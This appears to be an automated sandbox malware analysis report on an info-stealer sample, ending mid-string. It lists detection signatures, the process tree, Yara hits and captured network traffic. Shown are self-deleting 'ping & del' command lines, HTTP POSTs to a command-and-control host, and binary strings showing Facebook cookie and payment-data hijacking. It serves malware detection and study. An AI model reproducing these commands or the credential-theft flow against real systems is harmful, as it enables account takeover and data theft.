Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report fnhcdXEfus.exe

Overview

General Information

Sample Name:fnhcdXEfus.exe
Analysis ID:346325
MD5:18169f98e39ae228d131aec477c8a2e9
SHA1:c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
SHA256:344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
Tags:Mingloa

Most interesting Screenshot:

Detection

Score:90
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • fnhcdXEfus.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: 18169F98E39AE228D131AEC477C8A2E9)
    • msiexec.exe (PID: 4084 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 63C4F3D9EA0CC861.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • 1612045890161.exe (PID: 5440 cmdline: 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 3148 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 412 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6268 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 63C4F3D9EA0CC861.exe (PID: 6004 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • cmd.exe (PID: 1240 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 6164 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6328 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6372 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 5776 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5748 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 3492 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.fnhcdXEfus.exe.2810000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeMetadefender: Detection: 29%Perma Link
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted fileShow sources
Source: fnhcdXEfus.exeVirustotal: Detection: 73%Perma Link
Source: fnhcdXEfus.exeMetadefender: Detection: 29%Perma Link
Source: fnhcdXEfus.exeReversingLabs: Detection: 82%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: fnhcdXEfus.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,3_2_1001F720

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\Desktop\fnhcdXEfus.exeUnpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Uses 32bit PE filesShow sources
Source: fnhcdXEfus.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR DllsShow sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: fnhcdXEfus.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW,0_2_0042A5EF
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1001A170 FindFirstFileA,FindClose,3_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior

Networking:

barindex
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: C8DD8AE6DC4DC644.xyzAccept: */*
Source: global trafficHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1405Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: c8dd8ae6dc4dc644.xyz
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: C8DD8AE6DC4DC644.xyzAccept: */*
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: 